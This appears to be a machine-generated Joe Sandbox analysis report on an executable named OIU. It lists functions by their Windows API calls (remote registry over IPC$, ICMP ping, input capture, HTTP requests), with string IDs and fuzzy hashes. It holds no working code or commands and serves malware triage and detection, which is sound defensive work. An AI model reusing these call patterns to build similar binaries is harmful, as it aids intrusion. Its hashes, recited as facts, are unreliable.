                                                                        • Part of subcall function 00BA9CB3: _wcslen.LIBCMT ref: 00BA9CBD
                                                                      • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00BEF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00C09742
                                                                      • LoadStringW.USER32(00000000,?,00BEF7F8,00000001), ref: 00C09745
                                                                      • MessageBoxW.USER32 ref: 00C09866
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                       • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: HandleLoadModuleString$Message_wcslen
                                                                      • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                      • API String ID: 747408836-2268648507
                                                                      • Opcode ID: 9876fdbc3bd9fd9a4574b4215d15e5116fad168130de690a08ca188fecdaae99
                                                                      • Instruction ID: a608aea76454e3e4cfe74bd34181a7f357dbb5d2d3af4b86b9d41a73cf8eb75d
                                                                      • Opcode Fuzzy Hash: 9876fdbc3bd9fd9a4574b4215d15e5116fad168130de690a08ca188fecdaae99
                                                                      • Instruction Fuzzy Hash: 10414F72804219AACF14EBE0CD86EEEB7B8EF16740F1440A5F50572092EF356F49DB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                        • Part of subcall function 00BA6B57: _wcslen.LIBCMT ref: 00BA6B6A
                                                                      • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00C007A2
                                                                      • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00C007BE
                                                                      • RegOpenKeyExW.ADVAPI32 ref: 00C007DA
                                                                      • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 00C00804
                                                                      • CLSIDFromString.OLE32(?,000001FE), ref: 00C0082C
                                                                      • RegCloseKey.ADVAPI32(?), ref: 00C00837
                                                                      • RegCloseKey.ADVAPI32(?), ref: 00C0083C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                       • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                                      • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                      • API String ID: 323675364-22481851
                                                                      • Opcode ID: af343ffce847e13f26031f2ee4bc0a567941afa2bb7f0ffab856165390171b46
                                                                      • Instruction ID: 1b23f7332a91dd2a089fb6fa36484493de37607fd06dcf35ee7ef0e1a5fbbabc
                                                                      • Opcode Fuzzy Hash: af343ffce847e13f26031f2ee4bc0a567941afa2bb7f0ffab856165390171b46
                                                                      • Instruction Fuzzy Hash: 3D411972C14229ABCF15EBA4DC85EEDB7B8BF04750F554169E911B31A1EB345E04CBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CoInitialize.OLE32(00000000), ref: 00C17AF3
                                                                      • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00C17B8F
                                                                      • SHGetDesktopFolder.SHELL32(?), ref: 00C17BA3
                                                                      • CoCreateInstance.OLE32(00C3FD08,00000000,00000001,00C66E6C,?), ref: 00C17BEF
                                                                      • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00C17C74
                                                                      • CoTaskMemFree.OLE32(?), ref: 00C17CCC
                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 00C17D57
                                                                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00C17D7A
                                                                      • CoTaskMemFree.OLE32(00000000), ref: 00C17D81
                                                                      • CoTaskMemFree.OLE32(00000000), ref: 00C17DD6
                                                                      • CoUninitialize.OLE32 ref: 00C17DDC
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                       • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                      • String ID:
                                                                      • API String ID: 2762341140-0
                                                                      • Opcode ID: 5dcedba67548b70f907978a7bdf149956b1f74b9ef60380dc57f1903e8c27de7
                                                                      • Instruction ID: 0c8d50c271c0d177dbf5100e69326934599bd6c384ebb28dd926aaa14122426d
                                                                      • Opcode Fuzzy Hash: 5dcedba67548b70f907978a7bdf149956b1f74b9ef60380dc57f1903e8c27de7
                                                                      • Instruction Fuzzy Hash: 93C12C75A04109AFCB14DF64C898DAEBBF5FF49304B148599F816DB261D730EE81DB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00C35504
                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00C35515
                                                                      • CharNextW.USER32(00000158), ref: 00C35544
                                                                      • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00C35585
                                                                      • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00C3559B
                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00C355AC
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                       • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$CharNext
                                                                      • String ID:
                                                                      • API String ID: 1350042424-0
                                                                      • Opcode ID: efccf3fe8b2a7243fb699121f2e4c620bc7f0e88ca799ad28e1ee09a49c9274d
                                                                      • Instruction ID: 29ec1b69d9c06257b20f639e58d91bc3ca8ef4e8d88536e3ae29c6d9a780d873
                                                                      • Opcode Fuzzy Hash: efccf3fe8b2a7243fb699121f2e4c620bc7f0e88ca799ad28e1ee09a49c9274d
                                                                      • Instruction Fuzzy Hash: 5D618B71920608AFDF10DF95CC85AFE7BB9EB0A720F108145F925AA291D7749B81DFA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00BFFAAF
                                                                      • SafeArrayAllocData.OLEAUT32(?), ref: 00BFFB08
                                                                      • VariantInit.OLEAUT32(?), ref: 00BFFB1A
                                                                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 00BFFB3A
                                                                      • VariantCopy.OLEAUT32(?,?), ref: 00BFFB8D
                                                                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 00BFFBA1
                                                                      • VariantClear.OLEAUT32(?), ref: 00BFFBB6
                                                                      • SafeArrayDestroyData.OLEAUT32(?), ref: 00BFFBC3
                                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00BFFBCC
                                                                      • VariantClear.OLEAUT32(?), ref: 00BFFBDE
                                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00BFFBE9
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                       • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
Similarity
• API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
• String ID:
• API String ID: 2706829360-0
• Opcode ID: 6ea4461533c49638caf138d1abcb2a467e163b4ef4e414254c053f8f893229c0
• Instruction ID: 5255023fa8642b312e561d6b6431156310d414f604a980a7bee255e8054cf72a
• Opcode Fuzzy Hash: 6ea4461533c49638caf138d1abcb2a467e163b4ef4e414254c053f8f893229c0
• Instruction Fuzzy Hash: 64412135A0021A9FCF10DF64D894ABDBBB9EF48354F008065E955A7261DB34E945CF90
Uniqueness
• Uniqueness Score: -1.00%

APIs
• WSAStartup.WSOCK32(00000101,?), ref: 00C205BC
• inet_addr.WSOCK32(?), ref: 00C2061C
• gethostbyname.WSOCK32(?), ref: 00C20628
• IcmpCreateFile.IPHLPAPI ref: 00C20636
• IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00C206C6
• IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00C206E5
• IcmpCloseHandle.IPHLPAPI(?), ref: 00C207B9
• WSACleanup.WSOCK32 ref: 00C207BF
Strings
Similarity
• API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
• String ID: Ping
• API String ID: 1028309954-2246546115
• Opcode ID: e81e8ddff69f8c46f97e28b6d8fc4059b51a375c3dbabdbb92286ee97142a40b
• Instruction ID: 32f53fc2779a8b52fadc0214dba9eb280aa9ef97272c50ab9c3270794964ee6c
• Opcode Fuzzy Hash: e81e8ddff69f8c46f97e28b6d8fc4059b51a375c3dbabdbb92286ee97142a40b
• Instruction Fuzzy Hash: 03919D356082119FD320DF15D888F1ABBE0EF45718F2485AAF4699BAA3C770EE45CF91
Uniqueness
• Uniqueness Score: -1.00%

APIs
Strings
Similarity
• API ID: _wcslen$BuffCharLower
• String ID: cdecl$none$stdcall$winapi
• API String ID: 707087890-567219261
• Opcode ID: 1c53385dea7dd9c73ba0bad58baeb60c063ad68904a91198ae50746a9a29e12f
• Instruction ID: da93edcc0b84195bd5f8e4667ed6ca49ba4759488904aafad1286b04ef03437b
• Opcode Fuzzy Hash: 1c53385dea7dd9c73ba0bad58baeb60c063ad68904a91198ae50746a9a29e12f
• Instruction Fuzzy Hash: 9D51D236A051279BCF24DF6CD8809BEB3E5BF65724B214229E426E76C4DB30DE48C790
Uniqueness
• Uniqueness Score: -1.00%

APIs
• CoInitialize.OLE32 ref: 00C23774
• CoUninitialize.OLE32 ref: 00C2377F
• CoCreateInstance.OLE32(?,00000000,00000017,00C3FB78,?), ref: 00C237D9
• IIDFromString.OLE32(?,?), ref: 00C2384C
• VariantInit.OLEAUT32(?), ref: 00C238E4
• VariantClear.OLEAUT32(?), ref: 00C23936
Strings
Similarity
• API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
• String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
• API String ID: 636576611-1287834457
• Opcode ID: 56417462e8bf20dea9c42a0982086e09edca03589b54e2656f7db7e444426a52
• Instruction ID: b4eeceaf1d7bd6579d85cc5f923f8ac2ab372f432cd680dcc2090afdca353b87
• Opcode Fuzzy Hash: 56417462e8bf20dea9c42a0982086e09edca03589b54e2656f7db7e444426a52
• Instruction Fuzzy Hash: 5661D070608361AFD310DF64D888F6EB7E8EF49714F10081AF9959B691C774EE88CB92
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetLocalTime.KERNEL32(?), ref: 00C18257
• SystemTimeToFileTime.KERNEL32(?,?), ref: 00C18267
• LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00C18273
• GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00C18310
• SetCurrentDirectoryW.KERNEL32(?), ref: 00C18324
• SetCurrentDirectoryW.KERNEL32(?), ref: 00C18356
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00C1838C
• SetCurrentDirectoryW.KERNEL32(?), ref: 00C18395
Strings
Similarity
• API ID: CurrentDirectoryTime$File$Local$System
• String ID: *.*
• API String ID: 1464919966-438819550
• Opcode ID: e5c3d461f58e39a9e65955bcfaebec0e837790dd2df9ab95f0f9138bd72e6eee
• Instruction ID: db47ca176db92781213603e950349ff63ab42132d4214fbf9331bb1952778c32
• Opcode Fuzzy Hash: e5c3d461f58e39a9e65955bcfaebec0e837790dd2df9ab95f0f9138bd72e6eee
• Instruction Fuzzy Hash: 2C616D725083059FC710EF64C894A9EB3E8FF8A310F44495EF99997251DB31EA49CB92
Uniqueness
• Uniqueness Score: -1.00%

APIs
• LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00C133CF
  • Part of subcall function 00BA9CB3: _wcslen.LIBCMT ref: 00BA9CBD
• LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00C133F0
Strings
Similarity
• API ID: LoadString$_wcslen
• String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
• API String ID: 4099089115-3080491070
• Opcode ID: 61aa95ccb2b92f4d6ac7cb587e04580246b10f35c881e766e11b36a00f189374
• Instruction ID: fa734f54c6a6f440d89afe2d3a662f897c2285270a598ed646b78e15d0336db3
• Opcode Fuzzy Hash: 61aa95ccb2b92f4d6ac7cb587e04580246b10f35c881e766e11b36a00f189374
• Instruction Fuzzy Hash: 05518071904209ABDF15EBE0CD82EEEB7B9EF05744F1440A5F505720A2EB356F98EB60
Uniqueness
• Uniqueness Score: -1.00%

APIs
Strings
Similarity
• API ID: _wcslen$BuffCharUpper
• String ID: APPEND$EXISTS$KEYS$REMOVE
• API String ID: 1256254125-769500911
• Opcode ID: 726205dacb0cfaf4e4c7ea22065479c7317ef5c43fbf3cb29f9394cc6ae435e9
• Instruction ID: 4c4633b5693e491ebeae6250010b5ba8571c6f3b62d3f4c17522c494d4d0fcc1
• Opcode Fuzzy Hash: 726205dacb0cfaf4e4c7ea22065479c7317ef5c43fbf3cb29f9394cc6ae435e9
• Instruction Fuzzy Hash: 6241A432A001279ACB24DF7DC8905BEB7B5AFA1B54B244229F435DB2C4E732CE81C790
Uniqueness
• Uniqueness Score: -1.00%

APIs
• SetErrorMode.KERNEL32(00000001), ref: 00C153A0
• GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00C15416
• GetLastError.KERNEL32 ref: 00C15420
• SetErrorMode.KERNEL32(00000000,READY), ref: 00C154A7
Strings
Similarity
• API ID: Error$Mode$DiskFreeLastSpace
• String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
• API String ID: 4194297153-14809454
• Opcode ID: f851b0d210584cb2336e87ace9407193d97a7cf0fa761997607df05348d8b56b
• Instruction ID: d7dbd440e434990d6d84e4907832d8a9b83b4c0e2a907faf1cf1262b18f7fbff
• Opcode Fuzzy Hash: f851b0d210584cb2336e87ace9407193d97a7cf0fa761997607df05348d8b56b
• Instruction Fuzzy Hash: 9A318D75A00604DFCB10DF68C484BEEBBB4EB86305F148065E415DB292DB71DEC6EB90
Uniqueness
• Uniqueness Score: -1.00%

APIs
• SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00C33A9D
• SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00C33AA0
• GetWindowLongW.USER32(?,000000F0), ref: 00C33AC7
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00C33AEA
• SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00C33B62
• SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00C33BAC
• SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00C33BC7
• SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00C33BE2
• SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00C33BF6
• SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00C33C13
Similarity
• API ID: MessageSend$LongWindow
• String ID:
• API String ID: 312131281-0
• Opcode ID: 0ca7c9c4e4904eb8534fb0fc0ab503d31b6529b2e965f9b4eafb2f35c97bfdc5
• Instruction ID: 7ff0a6847835e24355496c08d36167552d68ba840139c4702cb4886d08a1140f
• Opcode Fuzzy Hash: 0ca7c9c4e4904eb8534fb0fc0ab503d31b6529b2e965f9b4eafb2f35c97bfdc5
• Instruction Fuzzy Hash: 00617A75900248AFDB11DFA8CC81FEEB7F8EB09714F144199FA15A72A1C774AE81DB50
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetCurrentThreadId.KERNEL32(?,?,?,?,?,00C0A1E1,?,00000001), ref: 00C0B151
• GetForegroundWindow.USER32 ref: 00C0B165
• GetWindowThreadProcessId.USER32(00000000), ref: 00C0B16C
• AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00C0B17B
• GetWindowThreadProcessId.USER32(?,00000000), ref: 00C0B18D
• AttachThreadInput.USER32(?,00000000,00000001), ref: 00C0B1A6
• AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00C0B1B8
• AttachThreadInput.USER32(00000000,00000000), ref: 00C0B1FD
• AttachThreadInput.USER32(?,?,00000000), ref: 00C0B212
• AttachThreadInput.USER32(00000000,?,00000000), ref: 00C0B21D
                                                                      Similarity
                                                                      • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                      • String ID:
                                                                      • API String ID: 2156557900-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • _free.LIBCMT ref: 00BD2C94
                                                                        • Part of subcall function 00BD29C8: HeapFree.KERNEL32(00000000,00000000), ref: 00BD29DE
                                                                        • Part of subcall function 00BD29C8: GetLastError.KERNEL32(00000000,?,00BDD7D1,00000000,00000000,00000000,00000000,?,00BDD7F8,00000000,00000007,00000000,?,00BDDBF5,00000000,00000000), ref: 00BD29F0
                                                                      • _free.LIBCMT ref: 00BD2CA0
                                                                      • _free.LIBCMT ref: 00BD2CAB
                                                                      • _free.LIBCMT ref: 00BD2CB6
                                                                      • _free.LIBCMT ref: 00BD2CC1
                                                                      • _free.LIBCMT ref: 00BD2CCC
                                                                      • _free.LIBCMT ref: 00BD2CD7
                                                                      • _free.LIBCMT ref: 00BD2CE2
                                                                      • _free.LIBCMT ref: 00BD2CED
                                                                      • _free.LIBCMT ref: 00BD2CFB
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                      • String ID:
                                                                      • API String ID: 776569668-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00BA1459
                                                                      • OleUninitialize.OLE32 ref: 00BA14F8
                                                                      • UnregisterHotKey.USER32(?), ref: 00BA16DD
                                                                      • DestroyWindow.USER32 ref: 00BE24B9
                                                                      • FreeLibrary.KERNEL32(?), ref: 00BE251E
                                                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00BE254B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                      • String ID: close all
                                                                      • API String ID: 469580280-3243417748
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • SetWindowLongW.USER32 ref: 00BA5C7A
                                                                        • Part of subcall function 00BA5D0A: GetClientRect.USER32 ref: 00BA5D30
                                                                        • Part of subcall function 00BA5D0A: GetWindowRect.USER32(?,?), ref: 00BA5D71
                                                                        • Part of subcall function 00BA5D0A: ScreenToClient.USER32(?,?), ref: 00BA5D99
                                                                      • GetDC.USER32 ref: 00BE46F5
                                                                      • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00BE4708
                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00BE4716
                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00BE472B
                                                                      • ReleaseDC.USER32(?,00000000), ref: 00BE4733
                                                                      • MoveWindow.USER32(?,?,?,?,?,?), ref: 00BE47C4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                      • String ID: U
                                                                      • API String ID: 4009187628-3372436214
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 00C135E4
                                                                        • Part of subcall function 00BA9CB3: _wcslen.LIBCMT ref: 00BA9CBD
                                                                      • LoadStringW.USER32(00C72390,?,00000FFF,?), ref: 00C1360A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: LoadString$_wcslen
                                                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                      • API String ID: 4099089115-2391861430
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                        • Part of subcall function 00BB9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00BB9BB2
                                                                        • Part of subcall function 00BB912D: GetCursorPos.USER32(?), ref: 00BB9141
                                                                        • Part of subcall function 00BB912D: ScreenToClient.USER32(00000000,?), ref: 00BB915E
                                                                        • Part of subcall function 00BB912D: GetAsyncKeyState.USER32 ref: 00BB9183
                                                                        • Part of subcall function 00BB912D: GetAsyncKeyState.USER32 ref: 00BB919D
                                                                      • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 00C38B6B
                                                                      • ImageList_EndDrag.COMCTL32 ref: 00C38B71
                                                                      • ReleaseCapture.USER32 ref: 00C38B77
                                                                      • SetWindowTextW.USER32 ref: 00C38C12
                                                                      • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00C38C25
                                                                      • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 00C38CFF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                      • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                      • API String ID: 1924731296-2107944366
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00C1C272
                                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C1C29A
